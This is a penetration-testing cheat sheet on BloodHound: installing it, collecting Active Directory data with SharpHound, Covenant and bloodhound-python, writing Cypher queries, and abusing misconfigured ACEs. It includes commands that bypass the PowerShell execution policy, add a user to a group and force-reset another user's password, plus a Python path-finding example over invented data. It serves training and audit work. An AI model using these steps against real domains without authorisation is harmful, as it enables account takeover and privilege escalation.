CSbyGB - Pentips
Bloodhound


Last updated 12 months ago

Setup and Install

  • Install: sudo apt install bloodhound

  • Launch neo4j for Setup: neo4j console

  • Open the link provided by neo4j, connect with default creds: neo4j:neo4j

  • Change the password

  • From the console launch bloodhound

  • Connect with the creds you just set up in neo4j

  • Note: sometimes Bloodhound will not properly process files. To solve this it can be useful to download a previous version; version 4.1.0 usually does the trick for me.

Grabbing Data to feed Bloodhound

  • Download and set up an ingestor, for instance Invoke-BloodHound for PowerShell, we can use

  • Put SharpHound on the target machine

  • From the cmd of the target run: powershell -ep bypass

  • Import SharpHound by dot-sourcing the script: . .\SharpHound.ps1

  • Now we can run Invoke-BloodHound to collect data: Invoke-BloodHound -CollectionMethod All -Domain DOMAIN.local -ZipFilename data.zip

  • Copy the zip file to your attacking machine

  • Click on Upload Data and double-click the zip file

  • In Analysis we can now click Find all Domains

  • We can also find the shortest paths to Domain Admins

  • We want to find boxes where a domain admin is logged in.

  • Transfer data to and from the target host with drive redirection: xfreerdp /v:IP /u:user /drive:data,/tmp

Grab Data with Sharphound.exe through a Covenant grunt

  • Upload Sharphound.exe with the upload command in Covenant

  • Launch it using shell sharphound.exe -c all

  • Once it is done, copy the file name of the generated zip

  • Use the Covenant download command

  • Once done, click on the file name; a pop-up opens where you can choose where to save the file

Bloodhound Python

  • Note: slower than the PowerShell and C# ingestors

  • Requirements: impacket toolkit, ldap3, and dnspython

  • pip install bloodhound

  • From a Linux box not joined to the domain:

    • Edit /etc/resolv.conf (the header shows the file is generated by resolvconf/systemd-resolved, so a hand edit may be overwritten later)

      # Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
      #     DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
      # 127.0.0.53 is the systemd-resolved stub resolver.
      # run "systemd-resolve --status" to see details about the actual nameservers.

      # "domain" and "search" are mutually exclusive in resolv.conf(5) and only the
      # last one is honoured, so name the target domain once and point at the DC
      search domain.local
      nameserver IP-ADR
  • bloodhound-python -dc domain-controller.domain.local -gc domain-controller.domain.local -d domain.local -c All -u first.last -p password

Analyzing data

  • Check out the Domain Users group and see the rights it has

  • Click on the pathfinding button and enter the domain to see if we have any direct paths to Domain Admin for all users

  • Run some of the Pre-Built Analytics Queries to find additional interesting information

    • Obtain a list of all Domain Admins

    • Look at the Find Shortest Paths to Domain Admins query

    • Find Principals with DCSync Rights: find accounts that can perform the DCSync attack, which will be covered in a later module.

    • Users with Foreign Domain Group Membership: find users that belong to groups in other domains. This can help mount cross-trust attacks.

    • Groups with Foreign Domain Group Membership: find groups that are part of groups in other domains. This can help mount cross-trust attacks.

    • Map Domain Trusts: find all trust relationships with the current domain.

    • Shortest Paths to Unconstrained Delegation Systems: find the shortest path to hosts with Unconstrained Delegation.

    • Shortest Paths from Kerberoastable Users: show the shortest path to Domain Admins by selecting, from a dropdown of all users, those that can be subjected to a Kerberoasting attack.

    • Shortest Path from Owned Principals: if we right-click a node and select Mark user as owned or Mark computer as owned, we can then run this query to see how far we can go from any users/computers that we have marked as "owned". This can be very useful for mounting further attacks.

    • Shortest Paths to Domain Admins from Owned Principals: find the shortest path to Domain Admin access from any user or computer marked as "owned".

    • Shortest Paths to High-Value Targets: this gives us the shortest path to any objects that BloodHound already considers a high-value target. It can also be used to find paths to any objects that we right-click on and select Mark X as High Value.

  • Look at GPOs as well (see the Enumerating Group Policy Objects (GPOs) section).

  • In BloodHound, we can right-click on any edge and click ? Help in the pop-up menu to get help on that specific edge, split into several tabs:

    • Info: general overview of the edge and what type of access it grants.

    • Abuse Info: specific tools/commands/techniques that can be used to abuse the privilege.

    • Opsec Considerations: also documented on the BloodHound wiki. This provides info on how "noisy" a particular command can be and what type of event log ID it will generate.

    • References: additional reading on tactics/tools/techniques that can be used to abuse the privilege.

Icons in Bloodhound

  • The icon images from the original page are not reproduced here; the page shows one icon for a user, one for a group and one for a GPO (a GPO node can be clicked to check its Node Info).

Cypher Query Language for custom queries

Structure of query

  • MATCH (A)-[B]->(C) RETURN A,B,C. Here A and C are nodes and B is the relationship from A to C.

  • MATCH (n:User),(m:Group) MATCH p=(n)-[r:MemberOf*1..3]->(m) RETURN p. Paths of one to three MemberOf hops from any user to any group.

Most common Keywords

  • MATCH: used before describing the search pattern for finding one or more nodes or relationships.

  • WHERE: used to add more constraints to specific patterns or filter out unwanted patterns.

  • RETURN: used to specify the results format and organize the resulting data. Results can be returned with specific properties, lists, ordering, etc.

  • CREATE and DELETE: used to create and delete nodes/relationships.

  • SET and REMOVE: used to set property values and add labels to nodes, or remove them.

  • MERGE: used to create nodes uniquely, without duplicates.

Example of query

  • MATCH p=(n:User)-[r:MemberOf*1..]->(m:Group {highvalue:true}) RETURN p. Find the members of all groups deemed to be "high-value targets".

  • MATCH (u:User) WHERE ANY (x IN u.serviceprincipalnames WHERE toUpper(x) CONTAINS 'SQL') RETURN u. Find users with a keyword in their Service Principal Name (SPN).

  • MATCH (u:User {dontreqpreauth: true}) RETURN u. Find users who do not require Kerberos pre-authentication.

  • MATCH (u:User) WHERE u.description IS NOT NULL RETURN u.name,u.description. Find all users with a description field that is not blank.

Edge relationships in Bloodhound

  • MemberOf One node (user, group, or computer) is a member of a second node (group)

  • AdminTo One node (user, group, or computer) has local admin rights on a second node (computer)

  • HasSession One node (user) has a session on a second node (computer)

  • TrustedBy One node (domain) is trusted by a second node (domain)

Exploiting ACEs

A significant number of ACEs can be misconfigured, and the exploitation technique for each varies. The BloodHound documentation explains the enumerated ACEs and how they can be exploited.

  • ForceChangePassword: We have the ability to set the user's password without knowing their current password.

  • AddMembers: We have the ability to add users (including our own account), groups or computers to the target group.

  • GenericAll: We have complete control over the object, including the ability to change the user's password, register an SPN or add an AD object to the target group.

  • GenericWrite: We can update any non-protected parameters of our target object. This could allow us to, for example, update the scriptPath parameter, which would cause a script to execute the next time the user logs on.

  • WriteOwner: We have the ability to update the owner of the target object. We could make ourselves the owner, allowing us to gain additional permissions over the object.

  • WriteDACL: We have the ability to write new ACEs to the target object's DACL. We could, for example, write an ACE that grants our account full control over the target object.

  • AllExtendedRights: We have the ability to perform any action associated with extended AD rights against the target object. This includes, for example, the ability to force change a user's password.

In order to exploit these ACEs, we will need a method to interact with AD to make these requests. The two best options for this are the AD-RSAT PowerShell cmdlets or PowerSploit. Depending on the breach and the detection tools in the environment, one option may be stealthier.
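The Cypher queries and edge list above describe how BloodHound answers "how does this principal reach Domain Admins", and the ACE list says which rights become edges. The following is an added example that is not code from this page or from the BloodHound project: it reloads SharpHound-style JSON into a plain Python graph and runs the same breadth-first search the "Shortest Paths to High-Value Targets" query performs, with an option to restrict the search to MemberOf hops as in the MATCH p=(n)-[r:MemberOf*1..3]->(m) pattern. The USERS and GROUPS dictionaries are constructed by hand and only loosely modelled on SharpHound v4 output (ObjectIdentifier, Properties, Members, Aces); every SID and account name is invented, and the right names use BloodHound's edge spelling (AddMember, WriteDacl) rather than the page's AddMembers/WriteDACL. Running it shows that barbara.reid reaches Domain Admins only through the AddMember and ForceChangePassword ACE edges, which is why a membership-only query misses that path.

```python
"""Shortest attack path over a constructed SharpHound-style dataset.

Added example, not code from the CSbyGB page or the BloodHound project.
MemberOf edges (member -> group) and abusable ACE edges (principal holding
the right -> object) are loaded from SharpHound-style JSON, then a BFS
finds the shortest path from a principal to any high-value node.
"""
from collections import deque

# Right names as BloodHound labels its ACE edges (the page's "Exploiting
# ACEs" list); any other right is ignored for pathfinding.
ABUSABLE_RIGHTS = {
    "GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
    "AddMember", "ForceChangePassword", "AllExtendedRights",
}

DOMAIN = "DOMAIN.LOCAL"
SID = "S-1-5-21-1000-2000-3000-"  # constructed domain SID prefix

# Constructed data: barbara.reid can add members to IT Support, IT Support can
# reset the password of t2_melanie.davies, who is a Tier 2 Admin, and the
# Tier 2 Admins group is nested in Domain Admins (highvalue).
USERS = {"data": [
    {"ObjectIdentifier": SID + "1104",
     "Properties": {"name": f"BARBARA.REID@{DOMAIN}", "highvalue": False},
     "Aces": []},
    {"ObjectIdentifier": SID + "1105",
     "Properties": {"name": f"T2_MELANIE.DAVIES@{DOMAIN}", "highvalue": False},
     "Aces": [{"PrincipalSID": SID + "1106", "PrincipalType": "Group",
               "RightName": "ForceChangePassword", "IsInherited": False}]},
]}
GROUPS = {"data": [
    {"ObjectIdentifier": SID + "1106",
     "Properties": {"name": f"IT SUPPORT@{DOMAIN}", "highvalue": False},
     "Members": [],
     "Aces": [{"PrincipalSID": SID + "1104", "PrincipalType": "User",
               "RightName": "AddMember", "IsInherited": False}]},
    {"ObjectIdentifier": SID + "1107",
     "Properties": {"name": f"TIER 2 ADMINS@{DOMAIN}", "highvalue": False},
     "Members": [{"ObjectIdentifier": SID + "1105", "ObjectType": "User"}],
     "Aces": []},
    {"ObjectIdentifier": SID + "512",
     "Properties": {"name": f"DOMAIN ADMINS@{DOMAIN}", "highvalue": True},
     "Members": [{"ObjectIdentifier": SID + "1107", "ObjectType": "Group"}],
     "Aces": []},
]}


def build_graph(*collections):
    """Return (names, highvalue, adjacency) from SharpHound-style collections.

    adjacency maps a SID to a list of (edge_name, target_sid), in the
    direction BloodHound draws: member -> group, right holder -> object.
    """
    names, highvalue, adj = {}, set(), {}
    for coll in collections:
        for obj in coll["data"]:
            sid = obj["ObjectIdentifier"]
            names[sid] = obj["Properties"]["name"]
            if obj["Properties"].get("highvalue"):
                highvalue.add(sid)
            adj.setdefault(sid, [])
            for member in obj.get("Members", []):          # MemberOf edge
                adj.setdefault(member["ObjectIdentifier"], []).append(("MemberOf", sid))
            for ace in obj.get("Aces", []):                # ACE edge
                if ace["RightName"] in ABUSABLE_RIGHTS:
                    adj.setdefault(ace["PrincipalSID"], []).append((ace["RightName"], sid))
    return names, highvalue, adj


def shortest_path(adj, start, targets, allowed=None, max_hops=None):
    """BFS from start to any SID in targets; returns [(src, edge, dst)] or None.

    allowed restricts edge types (e.g. {"MemberOf"}) and max_hops bounds the
    path length, mirroring a Cypher pattern such as [r:MemberOf*1..3].
    """
    parent, depth, queue = {start: None}, {start: 0}, deque([start])
    while queue:
        cur = queue.popleft()
        if cur in targets and cur != start:
            path = []
            while parent[cur] is not None:       # walk back to the start
                prev, edge = parent[cur]
                path.append((prev, edge, cur))
                cur = prev
            return path[::-1]
        if max_hops is not None and depth[cur] >= max_hops:
            continue
        for edge, nxt in adj.get(cur, []):
            if (allowed is None or edge in allowed) and nxt not in parent:
                parent[nxt], depth[nxt] = (cur, edge), depth[cur] + 1
                queue.append(nxt)
    return None


def path_to_high_value(start_name, allowed=None, max_hops=None):
    """'Shortest Paths to High-Value Targets' from one named principal."""
    names, highvalue, adj = build_graph(USERS, GROUPS)
    by_name = {name: sid for sid, name in names.items()}
    path = shortest_path(adj, by_name[start_name.upper()], highvalue, allowed, max_hops)
    # A PrincipalSID may be a well-known SID with no object of its own, so fall back to the SID
    return [(names.get(a, a), edge, names.get(b, b)) for a, edge, b in path] if path else []


if __name__ == "__main__":
    for src, edge, dst in path_to_high_value(f"barbara.reid@{DOMAIN}"):
        print(f"{src} -[{edge}]-> {dst}")
```

The same loader can be pointed at a real users.json/groups.json pair from a SharpHound zip (json.load them into USERS and GROUPS), which is a quick way to audit which non-inherited ACEs on your own tier-0 objects would turn into edges before an attacker's ingestor does.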

Examples

  • AddMembers: to exploit this we just need to add our user to the desired group using PowerShell: Add-ADGroupMember "IT Support" -Members "barbara.reid"

  • Check that it worked: Get-ADGroupMember -Identity "IT Support"

  • ForceChangePassword: identify a member of the group whose password we want to change in order to take over their account: Get-ADGroupMember -Identity "Tier 2 Admins"

  • Then we can change the password. Note: it can take up to 10 minutes to become effective; we might also need to disconnect and reconnect.

$Password = ConvertTo-SecureString "Newpassword1234!" -AsPlainText -Force 
Set-ADAccountPassword -Identity "t2_melanie.davies" -Reset -NewPassword $Password 

Other Tips Bloodhound

  • If we click on an edge (relationship) in the graph and select Help we get useful info about the selected edge. It is really worth having a look at the Help and Abuse Info tabs for more tips on ways of exploitation.

Bloodhound - Resources

Sources:

  • sharphound
  • ACTIVE DIRECTORY BLOODHOUND on HTB Academy
  • Tryhackme
  • Bloodhound - Lisandre
  • Bloodhound: A Pentester’s best friend by Warren Butterworth
  • Cypher Query Language
  • Edges in Bloodhound
  • SharpHound: Target Selection and API Usage - CptJesus
  • Exploiting AD - Tryhackme
  • BloodHound – Sniffing Out the Path Through Windows Domains - Michiel Lemmens
  • THE DOG WHISPERER'S HANDBOOK 3 - SadProcessor